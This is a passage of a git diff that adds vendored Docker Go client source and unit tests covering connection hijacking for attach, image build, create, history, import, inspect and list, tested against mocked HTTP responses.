map[string]string{ + "filters": expectedFiltersJSON, + }, + events: []events.Message{ + { + Type: "container", + ID: "1", + Action: "create", + }, + { + Type: "container", + ID: "2", + Action: "die", + }, + { + Type: "container", + ID: "3", + Action: "create", + }, + }, + expectedEvents: map[string]bool{ + "1": true, + "2": true, + "3": true, + }, + }, + } + + for _, eventsCase := range eventsCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + + for key, expected := range eventsCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + + buffer := new(bytes.Buffer) + + for _, e := range eventsCase.events { + b, _ := json.Marshal(e) + buffer.Write(b) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(buffer), + }, nil + }), + } + + messages, errs := client.Events(context.Background(), eventsCase.options) + + loop: + for { + select { + case err := <-errs: + if err != nil && err != io.EOF { + t.Fatal(err) + } + + break loop + case e := <-messages: + _, ok := eventsCase.expectedEvents[e.ID] + if !ok { + t.Fatalf("event received not expected with action %s & id %s", e.Action, e.ID) + } + } + } + } +} diff --git a/vendor/github.com/docker/docker/client/hijack.go b/vendor/github.com/docker/docker/client/hijack.go new file mode 100644 index 0000000000..74c53f52b3 --- /dev/null +++ b/vendor/github.com/docker/docker/client/hijack.go @@ -0,0 +1,177 @@ +package client + +import ( + "crypto/tls" + "errors" + "fmt" + "net" + "net/http" + "net/http/httputil" + "net/url" + "strings" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/tlsconfig" + 
"github.com/docker/go-connections/sockets" + "golang.org/x/net/context" +) + +// tlsClientCon holds tls information and a dialed connection. +type tlsClientCon struct { + *tls.Conn + rawConn net.Conn +} + +func (c *tlsClientCon) CloseWrite() error { + // Go standard tls.Conn doesn't provide the CloseWrite() method so we do it + // on its underlying connection. + if conn, ok := c.rawConn.(types.CloseWriter); ok { + return conn.CloseWrite() + } + return nil +} + +// postHijacked sends a POST request and hijacks the connection. +func (cli *Client) postHijacked(ctx context.Context, path string, query url.Values, body interface{}, headers map[string][]string) (types.HijackedResponse, error) { + bodyEncoded, err := encodeData(body) + if err != nil { + return types.HijackedResponse{}, err + } + + apiPath := cli.getAPIPath(path, query) + req, err := http.NewRequest("POST", apiPath, bodyEncoded) + if err != nil { + return types.HijackedResponse{}, err + } + req = cli.addHeaders(req, headers) + + req.Host = cli.addr + req.Header.Set("Connection", "Upgrade") + req.Header.Set("Upgrade", "tcp") + + conn, err := dial(cli.proto, cli.addr, resolveTLSConfig(cli.client.Transport)) + if err != nil { + if strings.Contains(err.Error(), "connection refused") { + return types.HijackedResponse{}, fmt.Errorf("Cannot connect to the Docker daemon. Is 'docker daemon' running on this host?") + } + return types.HijackedResponse{}, err + } + + // When we set up a TCP connection for hijack, there could be long periods + // of inactivity (a long running command with no output) that in certain + // network setups may cause ECONNTIMEOUT, leaving the client in an unknown + // state. 
Setting TCP KeepAlive on the socket connection will prohibit + // ECONNTIMEOUT unless the socket connection truly is broken + if tcpConn, ok := conn.(*net.TCPConn); ok { + tcpConn.SetKeepAlive(true) + tcpConn.SetKeepAlivePeriod(30 * time.Second) + } + + clientconn := httputil.NewClientConn(conn, nil) + defer clientconn.Close() + + // Server hijacks the connection, error 'connection closed' expected + _, err = clientconn.Do(req) + + rwc, br := clientconn.Hijack() + + return types.HijackedResponse{Conn: rwc, Reader: br}, err +} + +func tlsDial(network, addr string, config *tls.Config) (net.Conn, error) { + return tlsDialWithDialer(new(net.Dialer), network, addr, config) +} + +// We need to copy Go's implementation of tls.Dial (pkg/cryptor/tls/tls.go) in +// order to return our custom tlsClientCon struct which holds both the tls.Conn +// object _and_ its underlying raw connection. The rationale for this is that +// we need to be able to close the write end of the connection when attaching, +// which tls.Conn does not provide. +func tlsDialWithDialer(dialer *net.Dialer, network, addr string, config *tls.Config) (net.Conn, error) { + // We want the Timeout and Deadline values from dialer to cover the + // whole process: TCP connection and TLS handshake. This means that we + // also need to start our own timers now. 
+ timeout := dialer.Timeout + + if !dialer.Deadline.IsZero() { + deadlineTimeout := dialer.Deadline.Sub(time.Now()) + if timeout == 0 || deadlineTimeout < timeout { + timeout = deadlineTimeout + } + } + + var errChannel chan error + + if timeout != 0 { + errChannel = make(chan error, 2) + time.AfterFunc(timeout, func() { + errChannel <- errors.New("") + }) + } + + proxyDialer, err := sockets.DialerFromEnvironment(dialer) + if err != nil { + return nil, err + } + + rawConn, err := proxyDialer.Dial(network, addr) + if err != nil { + return nil, err + } + // When we set up a TCP connection for hijack, there could be long periods + // of inactivity (a long running command with no output) that in certain + // network setups may cause ECONNTIMEOUT, leaving the client in an unknown + // state. Setting TCP KeepAlive on the socket connection will prohibit + // ECONNTIMEOUT unless the socket connection truly is broken + if tcpConn, ok := rawConn.(*net.TCPConn); ok { + tcpConn.SetKeepAlive(true) + tcpConn.SetKeepAlivePeriod(30 * time.Second) + } + + colonPos := strings.LastIndex(addr, ":") + if colonPos == -1 { + colonPos = len(addr) + } + hostname := addr[:colonPos] + + // If no ServerName is set, infer the ServerName + // from the hostname we're connecting to. + if config.ServerName == "" { + // Make a copy to avoid polluting argument or default. + config = tlsconfig.Clone(config) + config.ServerName = hostname + } + + conn := tls.Client(rawConn, config) + + if timeout == 0 { + err = conn.Handshake() + } else { + go func() { + errChannel <- conn.Handshake() + }() + + err = <-errChannel + } + + if err != nil { + rawConn.Close() + return nil, err + } + + // This is Docker difference with standard's crypto/tls package: returned a + // wrapper which holds both the TLS and raw connections. 
+ return &tlsClientCon{conn, rawConn}, nil +} + +func dial(proto, addr string, tlsConfig *tls.Config) (net.Conn, error) { + if tlsConfig != nil && proto != "unix" && proto != "npipe" { + // Notice this isn't Go standard's tls.Dial function + return tlsDial(proto, addr, tlsConfig) + } + if proto == "npipe" { + return sockets.DialPipe(addr, 32*time.Second) + } + return net.Dial(proto, addr) +} diff --git a/vendor/github.com/docker/docker/client/image_build.go b/vendor/github.com/docker/docker/client/image_build.go new file mode 100644 index 0000000000..6fde75dcfd --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_build.go @@ -0,0 +1,123 @@ +package client + +import ( + "encoding/base64" + "encoding/json" + "io" + "net/http" + "net/url" + "strconv" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" +) + +// ImageBuild sends request to the daemon to build images. +// The Body in the response implement an io.ReadCloser and it's up to the caller to +// close it. 
+func (cli *Client) ImageBuild(ctx context.Context, buildContext io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) { + query, err := cli.imageBuildOptionsToQuery(options) + if err != nil { + return types.ImageBuildResponse{}, err + } + + headers := http.Header(make(map[string][]string)) + buf, err := json.Marshal(options.AuthConfigs) + if err != nil { + return types.ImageBuildResponse{}, err + } + headers.Add("X-Registry-Config", base64.URLEncoding.EncodeToString(buf)) + headers.Set("Content-Type", "application/tar") + + serverResp, err := cli.postRaw(ctx, "/build", query, buildContext, headers) + if err != nil { + return types.ImageBuildResponse{}, err + } + + osType := getDockerOS(serverResp.header.Get("Server")) + + return types.ImageBuildResponse{ + Body: serverResp.body, + OSType: osType, + }, nil +} + +func (cli *Client) imageBuildOptionsToQuery(options types.ImageBuildOptions) (url.Values, error) { + query := url.Values{ + "t": options.Tags, + "securityopt": options.SecurityOpt, + } + if options.SuppressOutput { + query.Set("q", "1") + } + if options.RemoteContext != "" { + query.Set("remote", options.RemoteContext) + } + if options.NoCache { + query.Set("nocache", "1") + } + if options.Remove { + query.Set("rm", "1") + } else { + query.Set("rm", "0") + } + + if options.ForceRemove { + query.Set("forcerm", "1") + } + + if options.PullParent { + query.Set("pull", "1") + } + + if options.Squash { + if err := cli.NewVersionError("1.25", "squash"); err != nil { + return query, err + } + query.Set("squash", "1") + } + + if !container.Isolation.IsDefault(options.Isolation) { + query.Set("isolation", string(options.Isolation)) + } + + query.Set("cpusetcpus", options.CPUSetCPUs) + query.Set("networkmode", options.NetworkMode) + query.Set("cpusetmems", options.CPUSetMems) + query.Set("cpushares", strconv.FormatInt(options.CPUShares, 10)) + query.Set("cpuquota", strconv.FormatInt(options.CPUQuota, 10)) + query.Set("cpuperiod", 
strconv.FormatInt(options.CPUPeriod, 10)) + query.Set("memory", strconv.FormatInt(options.Memory, 10)) + query.Set("memswap", strconv.FormatInt(options.MemorySwap, 10)) + query.Set("cgroupparent", options.CgroupParent) + query.Set("shmsize", strconv.FormatInt(options.ShmSize, 10)) + query.Set("dockerfile", options.Dockerfile) + + ulimitsJSON, err := json.Marshal(options.Ulimits) + if err != nil { + return query, err + } + query.Set("ulimits", string(ulimitsJSON)) + + buildArgsJSON, err := json.Marshal(options.BuildArgs) + if err != nil { + return query, err + } + query.Set("buildargs", string(buildArgsJSON)) + + labelsJSON, err := json.Marshal(options.Labels) + if err != nil { + return query, err + } + query.Set("labels", string(labelsJSON)) + + cacheFromJSON, err := json.Marshal(options.CacheFrom) + if err != nil { + return query, err + } + query.Set("cachefrom", string(cacheFromJSON)) + + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/image_build_test.go b/vendor/github.com/docker/docker/client/image_build_test.go new file mode 100644 index 0000000000..b9d04f817a --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_build_test.go @@ -0,0 +1,233 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/go-units" +) + +func TestImageBuildError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageBuild(context.Background(), nil, types.ImageBuildOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageBuild(t *testing.T) { + v1 := "value1" + v2 := "value2" + emptyRegistryConfig := "bnVsbA==" + buildCases := []struct { + buildOptions 
types.ImageBuildOptions + expectedQueryParams map[string]string + expectedTags []string + expectedRegistryConfig string + }{ + { + buildOptions: types.ImageBuildOptions{ + SuppressOutput: true, + NoCache: true, + Remove: true, + ForceRemove: true, + PullParent: true, + }, + expectedQueryParams: map[string]string{ + "q": "1", + "nocache": "1", + "rm": "1", + "forcerm": "1", + "pull": "1", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + SuppressOutput: false, + NoCache: false, + Remove: false, + ForceRemove: false, + PullParent: false, + }, + expectedQueryParams: map[string]string{ + "q": "", + "nocache": "", + "rm": "0", + "forcerm": "", + "pull": "", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + RemoteContext: "remoteContext", + Isolation: container.Isolation("isolation"), + CPUSetCPUs: "2", + CPUSetMems: "12", + CPUShares: 20, + CPUQuota: 10, + CPUPeriod: 30, + Memory: 256, + MemorySwap: 512, + ShmSize: 10, + CgroupParent: "cgroup_parent", + Dockerfile: "Dockerfile", + }, + expectedQueryParams: map[string]string{ + "remote": "remoteContext", + "isolation": "isolation", + "cpusetcpus": "2", + "cpusetmems": "12", + "cpushares": "20", + "cpuquota": "10", + "cpuperiod": "30", + "memory": "256", + "memswap": "512", + "shmsize": "10", + "cgroupparent": "cgroup_parent", + "dockerfile": "Dockerfile", + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + BuildArgs: map[string]*string{ + "ARG1": &v1, + "ARG2": &v2, + "ARG3": nil, + }, + }, + expectedQueryParams: map[string]string{ + "buildargs": `{"ARG1":"value1","ARG2":"value2","ARG3":null}`, + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + Ulimits: []*units.Ulimit{ + { + 
Name: "nproc", + Hard: 65557, + Soft: 65557, + }, + { + Name: "nofile", + Hard: 20000, + Soft: 40000, + }, + }, + }, + expectedQueryParams: map[string]string{ + "ulimits": `[{"Name":"nproc","Hard":65557,"Soft":65557},{"Name":"nofile","Hard":20000,"Soft":40000}]`, + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: emptyRegistryConfig, + }, + { + buildOptions: types.ImageBuildOptions{ + AuthConfigs: map[string]types.AuthConfig{ + "https://index.docker.io/v1/": { + Auth: "dG90bwo=", + }, + }, + }, + expectedQueryParams: map[string]string{ + "rm": "0", + }, + expectedTags: []string{}, + expectedRegistryConfig: "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289In19", + }, + } + for _, buildCase := range buildCases { + expectedURL := "/build" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + // Check request headers + registryConfig := r.Header.Get("X-Registry-Config") + if registryConfig != buildCase.expectedRegistryConfig { + return nil, fmt.Errorf("X-Registry-Config header not properly set in the request. Expected '%s', got %s", buildCase.expectedRegistryConfig, registryConfig) + } + contentType := r.Header.Get("Content-Type") + if contentType != "application/tar" { + return nil, fmt.Errorf("Content-type header not properly set in the request. Expected 'application/tar', got %s", contentType) + } + + // Check query parameters + query := r.URL.Query() + for key, expected := range buildCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. 
Expected '%s', got %s", key, expected, actual) + } + } + + // Check tags + if len(buildCase.expectedTags) > 0 { + tags := query["t"] + if !reflect.DeepEqual(tags, buildCase.expectedTags) { + return nil, fmt.Errorf("t (tags) not set in URL query properly. Expected '%s', got %s", buildCase.expectedTags, tags) + } + } + + headers := http.Header{} + headers.Add("Server", "Docker/v1.23 (MyOS)") + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + Header: headers, + }, nil + }), + } + buildResponse, err := client.ImageBuild(context.Background(), nil, buildCase.buildOptions) + if err != nil { + t.Fatal(err) + } + if buildResponse.OSType != "MyOS" { + t.Fatalf("expected OSType to be 'MyOS', got %s", buildResponse.OSType) + } + response, err := ioutil.ReadAll(buildResponse.Body) + if err != nil { + t.Fatal(err) + } + buildResponse.Body.Close() + if string(response) != "body" { + t.Fatalf("expected Body to contain 'body' string, got %s", response) + } + } +} + +func TestGetDockerOS(t *testing.T) { + cases := map[string]string{ + "Docker/v1.22 (linux)": "linux", + "Docker/v1.22 (windows)": "windows", + "Foo/v1.22 (bar)": "", + } + for header, os := range cases { + g := getDockerOS(header) + if g != os { + t.Fatalf("Expected %s, got %s", os, g) + } + } +} diff --git a/vendor/github.com/docker/docker/client/image_create.go b/vendor/github.com/docker/docker/client/image_create.go new file mode 100644 index 0000000000..cf023a7186 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_create.go @@ -0,0 +1,34 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/reference" +) + +// ImageCreate creates a new image based in the parent options. +// It returns the JSON content in the response body. 
+func (cli *Client) ImageCreate(ctx context.Context, parentReference string, options types.ImageCreateOptions) (io.ReadCloser, error) { + repository, tag, err := reference.Parse(parentReference) + if err != nil { + return nil, err + } + + query := url.Values{} + query.Set("fromImage", repository) + query.Set("tag", tag) + resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) + if err != nil { + return nil, err + } + return resp.body, nil +} + +func (cli *Client) tryImageCreate(ctx context.Context, query url.Values, registryAuth string) (serverResponse, error) { + headers := map[string][]string{"X-Registry-Auth": {registryAuth}} + return cli.post(ctx, "/images/create", query, nil, headers) +} diff --git a/vendor/github.com/docker/docker/client/image_create_test.go b/vendor/github.com/docker/docker/client/image_create_test.go new file mode 100644 index 0000000000..5c2edd2ad5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_create_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" +) + +func TestImageCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageCreate(context.Background(), "reference", types.ImageCreateOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageCreate(t *testing.T) { + expectedURL := "/images/create" + expectedImage := "test:5000/my_image" + expectedTag := "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff" + expectedReference := fmt.Sprintf("%s@%s", expectedImage, expectedTag) + expectedRegistryAuth := "eyJodHRwczovL2luZGV4LmRvY2tlci5pby92MS8iOnsiYXV0aCI6ImRHOTBid289IiwiZW1haWwiOiJqb2huQGRvZS5jb20ifX0=" + client := &Client{ + client: 
newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + registryAuth := r.Header.Get("X-Registry-Auth") + if registryAuth != expectedRegistryAuth { + return nil, fmt.Errorf("X-Registry-Auth header not properly set in the request. Expected '%s', got %s", expectedRegistryAuth, registryAuth) + } + + query := r.URL.Query() + fromImage := query.Get("fromImage") + if fromImage != expectedImage { + return nil, fmt.Errorf("fromImage not set in URL query properly. Expected '%s', got %s", expectedImage, fromImage) + } + + tag := query.Get("tag") + if tag != expectedTag { + return nil, fmt.Errorf("tag not set in URL query properly. Expected '%s', got %s", expectedTag, tag) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + createResponse, err := client.ImageCreate(context.Background(), expectedReference, types.ImageCreateOptions{ + RegistryAuth: expectedRegistryAuth, + }) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(createResponse) + if err != nil { + t.Fatal(err) + } + if err = createResponse.Close(); err != nil { + t.Fatal(err) + } + if string(response) != "body" { + t.Fatalf("expected Body to contain 'body' string, got %s", response) + } +} diff --git a/vendor/github.com/docker/docker/client/image_history.go b/vendor/github.com/docker/docker/client/image_history.go new file mode 100644 index 0000000000..acb1ee9278 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_history.go @@ -0,0 +1,22 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageHistory returns the changes in an image in history format. 
+func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) { + var history []types.ImageHistory + serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil) + if err != nil { + return history, err + } + + err = json.NewDecoder(serverResp.body).Decode(&history) + ensureReaderClosed(serverResp) + return history, err +} diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go new file mode 100644 index 0000000000..729edb1ad5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_history_test.go @@ -0,0 +1,60 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageHistoryError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageHistory(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageHistory(t *testing.T) { + expectedURL := "/images/image_id/history" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + b, err := json.Marshal([]types.ImageHistory{ + { + ID: "image_id1", + Tags: []string{"tag1", "tag2"}, + }, + { + ID: "image_id2", + Tags: []string{"tag1", "tag2"}, + }, + }) + if err != nil { + return nil, err + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(b)), + }, nil + }), + } + imageHistories, err := client.ImageHistory(context.Background(), "image_id") + if err != nil { + t.Fatal(err) + } + if len(imageHistories) 
!= 2 { + t.Fatalf("expected 2 containers, got %v", imageHistories) + } +} diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go new file mode 100644 index 0000000000..c6f154b249 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_import.go @@ -0,0 +1,37 @@ +package client + +import ( + "io" + "net/url" + + "golang.org/x/net/context" + + "github.com/docker/distribution/reference" + "github.com/docker/docker/api/types" +) + +// ImageImport creates a new image based in the source options. +// It returns the JSON content in the response body. +func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) { + if ref != "" { + //Check if the given image name can be resolved + if _, err := reference.ParseNamed(ref); err != nil { + return nil, err + } + } + + query := url.Values{} + query.Set("fromSrc", source.SourceName) + query.Set("repo", ref) + query.Set("tag", options.Tag) + query.Set("message", options.Message) + for _, change := range options.Changes { + query.Add("changes", change) + } + + resp, err := cli.postRaw(ctx, "/images/create", query, source.Source, nil) + if err != nil { + return nil, err + } + return resp.body, nil +} diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go new file mode 100644 index 0000000000..e309be74e6 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_import_test.go @@ -0,0 +1,81 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageImportError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + _, err := client.ImageImport(context.Background(), 
types.ImageImportSource{}, "image:tag", types.ImageImportOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server error, got %v", err) + } +} + +func TestImageImport(t *testing.T) { + expectedURL := "/images/create" + client := &Client{ + client: newMockClient(func(r *http.Request) (*http.Response, error) { + if !strings.HasPrefix(r.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) + } + query := r.URL.Query() + fromSrc := query.Get("fromSrc") + if fromSrc != "image_source" { + return nil, fmt.Errorf("fromSrc not set in URL query properly. Expected 'image_source', got %s", fromSrc) + } + repo := query.Get("repo") + if repo != "repository_name:imported" { + return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo) + } + tag := query.Get("tag") + if tag != "imported" { + return nil, fmt.Errorf("tag not set in URL query properly. Expected 'imported', got %s", tag) + } + message := query.Get("message") + if message != "A message" { + return nil, fmt.Errorf("message not set in URL query properly. Expected 'A message', got %s", message) + } + changes := query["changes"] + expectedChanges := []string{"change1", "change2"} + if !reflect.DeepEqual(expectedChanges, changes) { + return nil, fmt.Errorf("changes not set in URL query properly. 
Expected %v, got %v", expectedChanges, changes) + } + + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("response"))), + }, nil + }), + } + importResponse, err := client.ImageImport(context.Background(), types.ImageImportSource{ + Source: strings.NewReader("source"), + SourceName: "image_source", + }, "repository_name:imported", types.ImageImportOptions{ + Tag: "imported", + Message: "A message", + Changes: []string{"change1", "change2"}, + }) + if err != nil { + t.Fatal(err) + } + response, err := ioutil.ReadAll(importResponse) + if err != nil { + t.Fatal(err) + } + importResponse.Close() + if string(response) != "response" { + t.Fatalf("expected response to contain 'response', got %s", string(response)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go new file mode 100644 index 0000000000..b3a64ce2f8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_inspect.go @@ -0,0 +1,33 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ImageInspectWithRaw returns the image information and its raw representation. 
+func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) { + serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil) + if err != nil { + if serverResp.statusCode == http.StatusNotFound { + return types.ImageInspect{}, nil, imageNotFoundError{imageID} + } + return types.ImageInspect{}, nil, err + } + defer ensureReaderClosed(serverResp) + + body, err := ioutil.ReadAll(serverResp.body) + if err != nil { + return types.ImageInspect{}, nil, err + } + + var response types.ImageInspect + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go new file mode 100644 index 0000000000..74a4e49805 --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_inspect_test.go @@ -0,0 +1,71 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "reflect" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestImageInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.ImageInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageInspectImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, _, err := client.ImageInspectWithRaw(context.Background(), "unknown") + if err == nil || !IsErrImageNotFound(err) { + t.Fatalf("expected an imageNotFound error, got %v", err) + } +} + +func TestImageInspect(t *testing.T) { + expectedURL := "/images/image_id/json" + expectedTags := []string{"tag1", "tag2"} + client := 
&Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(types.ImageInspect{ + ID: "image_id", + RepoTags: expectedTags, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + imageInspect, _, err := client.ImageInspectWithRaw(context.Background(), "image_id") + if err != nil { + t.Fatal(err) + } + if imageInspect.ID != "image_id" { + t.Fatalf("expected `image_id`, got %s", imageInspect.ID) + } + if !reflect.DeepEqual(imageInspect.RepoTags, expectedTags) { + t.Fatalf("expected `%v`, got %v", expectedTags, imageInspect.RepoTags) + } +} diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go new file mode 100644 index 0000000000..f26464f67c --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_list.go @@ -0,0 +1,45 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// ImageList returns a list of images in the docker host. 
+func (cli *Client) ImageList(ctx context.Context, options types.ImageListOptions) ([]types.ImageSummary, error) { + var images []types.ImageSummary + query := url.Values{} + + optionFilters := options.Filters + referenceFilters := optionFilters.Get("reference") + if versions.LessThan(cli.version, "1.25") && len(referenceFilters) > 0 { + query.Set("filter", referenceFilters[0]) + for _, filterValue := range referenceFilters { + optionFilters.Del("reference", filterValue) + } + } + if optionFilters.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, optionFilters) + if err != nil { + return images, err + } + query.Set("filters", filterJSON) + } + if options.All { + query.Set("all", "1") + } + + serverResp, err := cli.get(ctx, "/images/json", query, nil) + if err != nil { + return images, err + } + + err = json.NewDecoder(serverResp.body).Decode(&images) + ensureReaderClosed(serverResp) + return images, err +} diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go new file mode 100644 index 0000000000..7c4a46414d --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_list_test.go @@ -0,0 +1,159 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +func TestImageListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.ImageList(context.Background(), types.ImageListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestImageList(t *testing.T) { + expectedURL := "/images/json" + + noDanglingfilters := filters.NewArgs() + noDanglingfilters.Add("dangling", "false") + + filters := 
